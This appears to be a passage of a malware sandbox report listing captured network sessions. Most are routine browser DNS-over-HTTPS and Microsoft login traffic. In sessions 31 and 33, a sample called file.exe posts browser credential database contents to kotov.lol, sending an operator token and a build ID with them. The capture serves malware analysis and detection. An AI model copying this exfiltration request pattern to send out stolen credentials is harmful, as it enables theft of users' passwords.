25	192.168.2.8	49763	172.64.41.3	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:00 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 11:28:00 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-29 11:28:00 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 29 Nov 2024 11:28:00 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ea2407398fc43a5-EWR alt-svc: h3=":443"; ma=86400
2024-11-29 11:28:00 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0f 00 04 8e fa 40 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom@c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49768	172.64.41.3	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:00 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 11:28:00 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-29 11:28:00 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 29 Nov 2024 11:28:00 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ea2407398860f3a-EWR alt-svc: h3=":443"; ma=86400
2024-11-29 11:28:00 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomHc)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49769	162.159.61.3	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:00 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 11:28:00 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49761	20.190.181.0	443

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:00 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-29 11:28:00 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-29 11:28:01 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 29 Nov 2024 11:27:01 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C516_BAY x-ms-request-id: 47b79bd4-96cb-4c20-a464-3ef6ee2aac08 PPServer: PPV: 30 H: PH1PEPF0001B7F6 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 29 Nov 2024 11:28:00 GMT Connection: close Content-Length: 11390
2024-11-29 11:28:01 UTC	11390	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49770	172.64.41.3	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:00 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 11:28:00 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-29 11:28:01 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 29 Nov 2024 11:28:00 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ea240760bb743af-EWR alt-svc: h3=":443"; ma=86400
2024-11-29 11:28:01 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f9 00 04 8e fa 40 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom@c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49772	172.64.41.3	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:00 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 11:28:00 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49783	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:01 UTC	318	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:01 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------GDHIEHJEBAAFIDHJEBGICont
2024-11-29 11:28:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:01 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
2024-11-29 11:28:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:01 UTC	3313	OUT	Data Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31 Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-11-29 11:28:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:28:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49786	172.64.41.3	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:01 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 11:28:01 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-29 11:28:02 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 29 Nov 2024 11:28:02 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ea2407dfee28cee-EWR alt-svc: h3=":443"; ma=86400
2024-11-29 11:28:02 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e4 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49792	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:03 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------HDBGHIDGDGHCBGDGCBFICont
2024-11-29 11:28:03 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
